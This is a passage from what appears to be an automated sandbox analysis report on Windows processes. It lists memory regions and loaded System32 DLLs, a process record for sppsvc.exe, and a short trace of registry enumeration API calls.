"\\Windows\\System32\\networkhelper.dll" (normalized: "c:\\windows\\system32\\networkhelper.dll") Region: id = 5014 start_va = 0x7ffadee50000 end_va = 0x7ffadee9dfff entry_point = 0x7ffadee50000 region_type = mapped_file name = "aphostservice.dll" filename = "\\Windows\\System32\\APHostService.dll" (normalized: "c:\\windows\\system32\\aphostservice.dll") Region: id = 5015 start_va = 0x7ffae5a20000 end_va = 0x7ffae5a40fff entry_point = 0x7ffae5a20000 region_type = mapped_file name = "userdatatimeutil.dll" filename = "\\Windows\\System32\\UserDataTimeUtil.dll" (normalized: "c:\\windows\\system32\\userdatatimeutil.dll") Region: id = 5016 start_va = 0x7ffae81b0000 end_va = 0x7ffae81f7fff entry_point = 0x7ffae81b0000 region_type = mapped_file name = "vaultcli.dll" filename = "\\Windows\\System32\\vaultcli.dll" (normalized: "c:\\windows\\system32\\vaultcli.dll") Region: id = 5017 start_va = 0x7ffae84e0000 end_va = 0x7ffae84ecfff entry_point = 0x7ffae84e0000 region_type = mapped_file name = "inproclogger.dll" filename = "\\Windows\\System32\\InprocLogger.dll" (normalized: "c:\\windows\\system32\\inproclogger.dll") Region: id = 5018 start_va = 0x7ffae89d0000 end_va = 0x7ffae89dafff entry_point = 0x7ffae89d0000 region_type = mapped_file name = "mccspal.dll" filename = "\\Windows\\System32\\MCCSPal.dll" (normalized: "c:\\windows\\system32\\mccspal.dll") Region: id = 5019 start_va = 0x7ffae8ad0000 end_va = 0x7ffae8adbfff entry_point = 0x7ffae8ad0000 region_type = mapped_file name = "dsclient.dll" filename = "\\Windows\\System32\\dsclient.dll" (normalized: "c:\\windows\\system32\\dsclient.dll") Region: id = 5020 start_va = 0x7ffae8ae0000 end_va = 0x7ffae8af0fff entry_point = 0x7ffae8ae0000 region_type = mapped_file name = "userdatatypehelperutil.dll" filename = "\\Windows\\System32\\UserDataTypeHelperUtil.dll" (normalized: "c:\\windows\\system32\\userdatatypehelperutil.dll") Region: id = 5021 start_va = 0x7ffaeb090000 end_va = 0x7ffaeb371fff entry_point = 0x7ffaeb090000 region_type = mapped_file name = "esent.dll" filename = "\\Windows\\System32\\esent.dll" (normalized: "c:\\windows\\system32\\esent.dll") Region: id = 5022 start_va = 0x7ffaed180000 end_va = 0x7ffaed18ffff entry_point = 0x7ffaed180000 region_type = mapped_file name = "aphostclient.dll" filename = "\\Windows\\System32\\APHostClient.dll" (normalized: "c:\\windows\\system32\\aphostclient.dll") Region: id = 5023 start_va = 0x7ffaedb10000 end_va = 0x7ffaede85fff entry_point = 0x7ffaedb10000 region_type = mapped_file name = "iertutil.dll" filename = "\\Windows\\System32\\iertutil.dll" (normalized: "c:\\windows\\system32\\iertutil.dll") Region: id = 5024 start_va = 0x7ffaef620000 end_va = 0x7ffaef6f5fff entry_point = 0x7ffaef620000 region_type = mapped_file name = "winhttp.dll" filename = "\\Windows\\System32\\winhttp.dll" (normalized: "c:\\windows\\system32\\winhttp.dll") Region: id = 5025 start_va = 0x7ffaf0de0000 end_va = 0x7ffaf0f10fff entry_point = 0x7ffaf0de0000 region_type = mapped_file name = "wintypes.dll" filename = "\\Windows\\System32\\WinTypes.dll" (normalized: "c:\\windows\\system32\\wintypes.dll") Region: id = 5026 start_va = 0x7ffaf1b70000 end_va = 0x7ffaf1b87fff entry_point = 0x7ffaf1b70000 region_type = mapped_file name = "nlaapi.dll" filename = "\\Windows\\System32\\nlaapi.dll" (normalized: "c:\\windows\\system32\\nlaapi.dll") Region: id = 5027 start_va = 0x7ffaf37e0000 end_va = 0x7ffaf3811fff entry_point = 0x7ffaf37e0000 region_type = mapped_file name = "ntmarta.dll" filename = "\\Windows\\System32\\ntmarta.dll" (normalized: "c:\\windows\\system32\\ntmarta.dll") Region: id = 5028 start_va = 0x7ffaf3c40000 end_va = 0x7ffaf3c9efff entry_point = 0x7ffaf3c40000 region_type = mapped_file name = "msv1_0.dll" filename = "\\Windows\\System32\\msv1_0.dll" (normalized: "c:\\windows\\system32\\msv1_0.dll") Region: id = 5029 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 5030 start_va = 0x7ffaf3e50000 end_va = 0x7ffaf3e63fff entry_point = 0x7ffaf3e50000 region_type = mapped_file name = "cryptdll.dll" filename = "\\Windows\\System32\\cryptdll.dll" (normalized: "c:\\windows\\system32\\cryptdll.dll") Region: id = 5031 start_va = 0x7ffaf4170000 end_va = 0x7ffaf417afff entry_point = 0x7ffaf4170000 region_type = mapped_file name = "ntlmshared.dll" filename = "\\Windows\\System32\\NtlmShared.dll" (normalized: "c:\\windows\\system32\\ntlmshared.dll") Region: id = 5032 start_va = 0x7ffaf41b0000 end_va = 0x7ffaf41dbfff entry_point = 0x7ffaf41b0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\System32\\sspicli.dll" (normalized: "c:\\windows\\system32\\sspicli.dll") Region: id = 5033 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 5034 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 5035 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 5036 start_va = 0x7ffaf4440000 end_va = 0x7ffaf4489fff entry_point = 0x7ffaf4440000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 5037 start_va = 0x7ffaf4490000 end_va = 0x7ffaf44a2fff entry_point = 0x7ffaf4490000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 5038 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 5039 start_va = 0x7ffaf4bc0000 end_va = 0x7ffaf4c72fff entry_point = 0x7ffaf4bc0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 5040 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 5041 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 5042 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 5043 start_va = 0x7ffaf53c0000 end_va = 0x7ffaf53f5fff entry_point = 0x7ffaf53c0000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 5044 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 5045 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 5046 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 5047 start_va = 0x7ffaf6ec0000 end_va = 0x7ffaf6f64fff entry_point = 0x7ffaf6ec0000 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 5048 start_va = 0x7ffaf6f70000 end_va = 0x7ffaf70cbfff entry_point = 0x7ffaf6f70000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\System32\\msctf.dll" (normalized: "c:\\windows\\system32\\msctf.dll") Region: id = 5049 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 5050 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 5051 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 5052 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 5053 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 6399 start_va = 0xe45d500000 end_va = 0xe45d500fff entry_point = 0x0 region_type = private name = "private_0x000000e45d500000" filename = "" Region: id = 6598 start_va = 0xe45f520000 end_va = 0xe45f61ffff entry_point = 0x0 region_type = private name = "private_0x000000e45f520000" filename = "" Region: id = 6599 start_va = 0x7ff7871b4000 end_va = 0x7ff7871b5fff entry_point = 0x0 region_type = private name = "private_0x00007ff7871b4000" filename = "" Region: id = 6600 start_va = 0x7ffae8760000 end_va = 0x7ffae8825fff entry_point = 0x7ffae8760000 region_type = mapped_file name = "tokenbroker.dll" filename = "\\Windows\\System32\\TokenBroker.dll" (normalized: "c:\\windows\\system32\\tokenbroker.dll") Region: id = 6601 start_va = 0xe45d550000 end_va = 0xe45d5cffff entry_point = 0x0 region_type = private name = "private_0x000000e45d550000" filename = "" Region: id = 6602 start_va = 0x7ff7871ba000 end_va = 0x7ff7871bbfff entry_point = 0x0 region_type = private name = "private_0x00007ff7871ba000" filename = "" Region: id = 6603 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 6604 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 6605 start_va = 0x7ffaf3a50000 end_va = 0x7ffaf3a6efff entry_point = 0x7ffaf3a50000 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 6606 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 6607 start_va = 0xe45f620000 end_va = 0xe45f956fff entry_point = 0xe45f620000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 6658 start_va = 0xe45f120000 end_va = 0xe45f21ffff entry_point = 0x0 region_type = private name = "private_0x000000e45f120000" filename = "" Region: id = 6659 start_va = 0x7ff78708e000 end_va = 0x7ff78708ffff entry_point = 0x0 region_type = private name = "private_0x00007ff78708e000" filename = "" Region: id = 6660 start_va = 0x7ffae8b60000 end_va = 0x7ffae8fc9fff entry_point = 0x7ffae8b60000 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 6661 start_va = 0x7ffaf2a00000 end_va = 0x7ffaf2a12fff entry_point = 0x7ffaf2a00000 region_type = mapped_file name = "wtsapi32.dll" filename = "\\Windows\\System32\\wtsapi32.dll" (normalized: "c:\\windows\\system32\\wtsapi32.dll") Region: id = 6662 start_va = 0x7ffaecf40000 end_va = 0x7ffaecf66fff entry_point = 0x7ffaecf40000 region_type = mapped_file name = "idstore.dll" filename = "\\Windows\\System32\\IDStore.dll" (normalized: "c:\\windows\\system32\\idstore.dll") Region: id = 6663 start_va = 0x7ffaf0a90000 end_va = 0x7ffaf0aabfff entry_point = 0x7ffaf0a90000 region_type = mapped_file name = "samlib.dll" filename = "\\Windows\\System32\\samlib.dll" (normalized: "c:\\windows\\system32\\samlib.dll") Region: id = 7334 start_va = 0xe45d5d0000 end_va = 0xe45d5f9fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000e45d5d0000" filename = "" Thread: id = 759 os_tid = 0xee4 Thread: id = 760 os_tid = 0x388 Thread: id = 761 os_tid = 0x15c Thread: id = 787 os_tid = 0xecc Thread: id = 840 os_tid = 0xa3c Thread: id = 841 os_tid = 0xea0 Thread: id = 845 os_tid = 0x948 Process: id = "77" image_name = "sppsvc.exe" filename = "c:\\windows\\system32\\sppsvc.exe" page_root = "0x76467000" os_pid = "0xf74" os_integrity_level = "0x4000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "38" os_parent_pid = "0x1e4" cmd_line = "C:\\Windows\\system32\\sppsvc.exe" cur_dir = "C:\\Windows" os_username = "NT AUTHORITY\\Network Service" os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\sppsvc" [0xe], "NT AUTHORITY\\Logon Session 00000000:0007e9ab" [0xc000000f], "LOCAL" [0x7] Region: id = 2769 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 2770 start_va = 0x4a5ba10000 end_va = 0x4a5ba16fff entry_point = 0x0 region_type = private name = "private_0x0000004a5ba10000" filename = "" Region: id = 2771 start_va = 0x4a5ba20000 end_va = 0x4a5ba2ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a5ba20000" filename = "" Region: id = 2772 start_va = 0x4a5ba30000 end_va = 0x4a5ba43fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a5ba30000" filename = "" Region: id = 2773 start_va = 0x4a5ba50000 end_va = 0x4a5bacffff entry_point = 0x0 region_type = private name = "private_0x0000004a5ba50000" filename = "" Region: id = 2774 start_va = 0x4a5bad0000 end_va = 0x4a5bbcffff entry_point = 0x0 region_type = private name = "private_0x0000004a5bad0000" filename = "" Region: id = 2775 start_va = 0x4a5bbd0000 end_va = 0x4a5bc8dfff entry_point = 0x4a5bbd0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 2776 start_va = 0x4a5bc90000 end_va = 0x4a5bd0ffff entry_point = 0x0 region_type = private name = "private_0x0000004a5bc90000" filename = "" Region: id = 2777 start_va = 0x4a5bd10000 end_va = 0x4a5bd16fff entry_point = 0x0 region_type = private name = "private_0x0000004a5bd10000" filename = "" Region: id = 2778 start_va = 0x4a5bd20000 end_va = 0x4a5bea7fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a5bd20000" filename = "" Region: id = 2779 start_va = 0x4a5beb0000 end_va = 0x4a5beb5fff entry_point = 0x4a5beb0000 region_type = mapped_file name = "sppsvc.exe.mui" filename = "\\Windows\\System32\\en-US\\sppsvc.exe.mui" (normalized: "c:\\windows\\system32\\en-us\\sppsvc.exe.mui") Region: id = 2780 start_va = 0x4a5bec0000 end_va = 0x4a5bec0fff entry_point = 0x0 region_type = private name = "private_0x0000004a5bec0000" filename = "" Region: id = 2781 start_va = 0x4a5bed0000 end_va = 0x4a5bedffff entry_point = 0x0 region_type = private name = "private_0x0000004a5bed0000" filename = "" Region: id = 2782 start_va = 0x4a5bee0000 end_va = 0x4a5c060fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a5bee0000" filename = "" Region: id = 2783 start_va = 0x4a5c070000 end_va = 0x4a5c12ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000004a5c070000" filename = "" Region: id = 2784 start_va = 0x4a5c130000 end_va = 0x4a5c130fff entry_point = 0x0 region_type = private name = "private_0x0000004a5c130000" filename = "" Region: id = 2785 start_va = 0x4a5c140000 end_va = 0x4a5c14ffff entry_point = 0x0 region_type = private name = "private_0x0000004a5c140000" filename = "" Region: id = 2786 start_va = 0x4a5c150000 end_va = 0x4a5c15ffff entry_point = 0x0 region_type = private name = "private_0x0000004a5c150000" filename = "" Region: id = 2787 start_va = 0x4a5c160000 end_va = 0x4a5c1dffff entry_point = 0x0 region_type = private name = "private_0x0000004a5c160000" filename = "" Region: id = 2788 start_va = 0x4a5c1e0000 end_va = 0x4a5c2dffff entry_point = 0x0 region_type = private name = "private_0x0000004a5c1e0000" filename = "" Region: id = 2789 start_va = 0x4a5c2e0000 end_va = 0x4a5c35ffff entry_point = 0x0 region_type = private name = "private_0x0000004a5c2e0000" filename = "" Region: id = 2790 start_va = 0x4a5c360000 end_va = 0x4a5c3dffff entry_point = 0x0 region_type = private name = "private_0x0000004a5c360000" filename = "" Region: id = 2791 start_va = 0x4a5c3e0000 end_va = 0x4a5c716fff entry_point = 0x4a5c3e0000 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 2792 start_va = 0x7df5ff160000 end_va = 0x7ff5ff15ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ff160000" filename = "" Region: id = 2793 start_va = 0x7ff62a750000 end_va = 0x7ff62a84ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff62a750000" filename = "" Region: id = 2794 start_va = 0x7ff62a850000 end_va = 0x7ff62a872fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007ff62a850000" filename = "" Region: id = 2795 start_va = 0x7ff62a875000 end_va = 0x7ff62a876fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a875000" filename = "" Region: id = 2796 start_va = 0x7ff62a877000 end_va = 0x7ff62a878fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a877000" filename = "" Region: id = 2797 start_va = 0x7ff62a879000 end_va = 0x7ff62a879fff entry_point = 0x0 region_type = private name = "private_0x00007ff62a879000" filename = "" Region: id = 2798 start_va = 0x7ff62a87a000 end_va = 0x7ff62a87bfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a87a000" filename = "" Region: id = 2799 start_va = 0x7ff62a87c000 end_va = 0x7ff62a87dfff entry_point = 0x0 region_type = private name = "private_0x00007ff62a87c000" filename = "" Region: id = 2800 start_va = 0x7ff62a87e000 end_va = 0x7ff62a87ffff entry_point = 0x0 region_type = private name = "private_0x00007ff62a87e000" filename = "" Region: id = 2801 start_va = 0x7ff62b6c0000 end_va = 0x7ff62bcedfff entry_point = 0x7ff62b6c0000 region_type = mapped_file name = "sppsvc.exe" filename = "\\Windows\\System32\\sppsvc.exe" (normalized: "c:\\windows\\system32\\sppsvc.exe") Region: id = 2802 start_va = 0x7ffadf150000 end_va = 0x7ffadf2cafff entry_point = 0x7ffadf150000 region_type = mapped_file name = "webservices.dll" filename = "\\Windows\\System32\\webservices.dll" (normalized: "c:\\windows\\system32\\webservices.dll") Region: id = 2803 start_va = 0x7ffaef9c0000 end_va = 0x7ffaef9f5fff entry_point = 0x7ffaef9c0000 region_type = mapped_file name = "xmllite.dll" filename = "\\Windows\\System32\\xmllite.dll" (normalized: "c:\\windows\\system32\\xmllite.dll") Region: id = 2804 start_va = 0x7ffaf04b0000 end_va = 0x7ffaf04c5fff entry_point = 0x7ffaf04b0000 region_type = mapped_file name = "clipc.dll" filename = "\\Windows\\System32\\Clipc.dll" (normalized: "c:\\windows\\system32\\clipc.dll") Region: id = 2805 start_va = 0x7ffaf04d0000 end_va = 0x7ffaf04f1fff entry_point = 0x7ffaf04d0000 region_type = mapped_file name = "cryptxml.dll" filename = "\\Windows\\System32\\cryptxml.dll" (normalized: "c:\\windows\\system32\\cryptxml.dll") Region: id = 2806 start_va = 0x7ffaf3960000 end_va = 0x7ffaf3992fff entry_point = 0x7ffaf3960000 region_type = mapped_file name = "rsaenh.dll" filename = "\\Windows\\System32\\rsaenh.dll" (normalized: "c:\\windows\\system32\\rsaenh.dll") Region: id = 2807 start_va = 0x7ffaf3d00000 end_va = 0x7ffaf3d16fff entry_point = 0x7ffaf3d00000 region_type = mapped_file name = "cryptsp.dll" filename = "\\Windows\\System32\\cryptsp.dll" (normalized: "c:\\windows\\system32\\cryptsp.dll") Region: id = 2808 start_va = 0x7ffaf41e0000 end_va = 0x7ffaf41eafff entry_point = 0x7ffaf41e0000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\System32\\cryptbase.dll" (normalized: "c:\\windows\\system32\\cryptbase.dll") Region: id = 2809 start_va = 0x7ffaf4260000 end_va = 0x7ffaf4287fff entry_point = 0x7ffaf4260000 region_type = mapped_file name = "bcrypt.dll" filename = "\\Windows\\System32\\bcrypt.dll" (normalized: "c:\\windows\\system32\\bcrypt.dll") Region: id = 2810 start_va = 0x7ffaf4290000 end_va = 0x7ffaf42fafff entry_point = 0x7ffaf4290000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 2811 start_va = 0x7ffaf44b0000 end_va = 0x7ffaf44c0fff entry_point = 0x7ffaf44b0000 region_type = mapped_file name = "msasn1.dll" filename = "\\Windows\\System32\\msasn1.dll" (normalized: "c:\\windows\\system32\\msasn1.dll") Region: id = 2812 start_va = 0x7ffaf44d0000 end_va = 0x7ffaf44defff entry_point = 0x7ffaf44d0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 2813 start_va = 0x7ffaf4c80000 end_va = 0x7ffaf4e40fff entry_point = 0x7ffaf4c80000 region_type = mapped_file name = "crypt32.dll" filename = "\\Windows\\System32\\crypt32.dll" (normalized: "c:\\windows\\system32\\crypt32.dll") Region: id = 2814 start_va = 0x7ffaf4e50000 end_va = 0x7ffaf502cfff entry_point = 0x7ffaf4e50000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 2815 start_va = 0x7ffaf5140000 end_va = 0x7ffaf528dfff entry_point = 0x7ffaf5140000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 2816 start_va = 0x7ffaf5290000 end_va = 0x7ffaf53b5fff entry_point = 0x7ffaf5290000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 2817 start_va = 0x7ffaf55b0000 end_va = 0x7ffaf56f0fff entry_point = 0x7ffaf55b0000 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 2818 start_va = 0x7ffaf5700000 end_va = 0x7ffaf579cfff entry_point = 0x7ffaf5700000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 2819 start_va = 0x7ffaf57a0000 end_va = 0x7ffaf57fafff entry_point = 0x7ffaf57a0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 2820 start_va = 0x7ffaf5800000 end_va = 0x7ffaf5984fff entry_point = 0x7ffaf5800000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 2821 start_va = 0x7ffaf70d0000 end_va = 0x7ffaf717cfff entry_point = 0x7ffaf70d0000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 2822 start_va = 0x7ffaf7190000 end_va = 0x7ffaf724dfff entry_point = 0x7ffaf7190000 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 2823 start_va = 0x7ffaf72e0000 end_va = 0x7ffaf755bfff entry_point = 0x7ffaf72e0000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 2824 start_va = 0x7ffaf75d0000 end_va = 0x7ffaf7675fff entry_point = 0x7ffaf75d0000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 2825 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 762 os_tid = 0x990 Thread: id = 763 os_tid = 0x95c Thread: id = 764 os_tid = 0xf8c Thread: id = 765 os_tid = 0xf84 [0261.652] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x0, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="478C035F-04BC-48C7-B324-2462D786DAD7-5P-9", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.653] wcsncmp (_String1="478C035F-04BC-48C7-B324-2462D786DAD7-5P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned -4 [0261.654] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x1, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-1", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.654] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.656] _errno () returned 0x4a5bed55a0 [0261.658] RegOpenKeyW (in: hKey=0x1c4, lpSubKey="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-1", phkResult=0x4a5c35edb8 | out: phkResult=0x4a5c35edb8*=0x1c8) returned 0x0 [0261.658] RegQueryValueExW (in: hKey=0x1c8, lpValueName="", lpReserved=0x0, lpType=0x4a5c35ede8, lpData=0x4a5c35ee50, lpcbData=0x4a5c35ed88*=0xa0 | out: lpType=0x4a5c35ede8*=0x3, lpData=0x4a5c35ee50*, lpcbData=0x4a5c35ed88*=0x90) returned 0x0 [0261.658] RegEnumKeyExW (in: hKey=0x1c4, dwIndex=0x2, lpName=0x4a5c35eef0, lpcchName=0x4a5c35edc8, lpReserved=0x0, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0 | out: lpName="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P-10", lpcchName=0x4a5c35edc8, lpClass=0x0, lpcchClass=0x0, lpftLastWriteTime=0x0) returned 0x0 [0261.658] wcsncmp (_String1="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _String2="8DEC0AF1-0341-4b93-85CD-72606C2DF94C-7P", _MaxCount=0x27) returned 0 [0261.658] _errno () returned 0x4a5bed55a0 [0261.658] RegOpenKeyW (in: hKey=0x1c4, 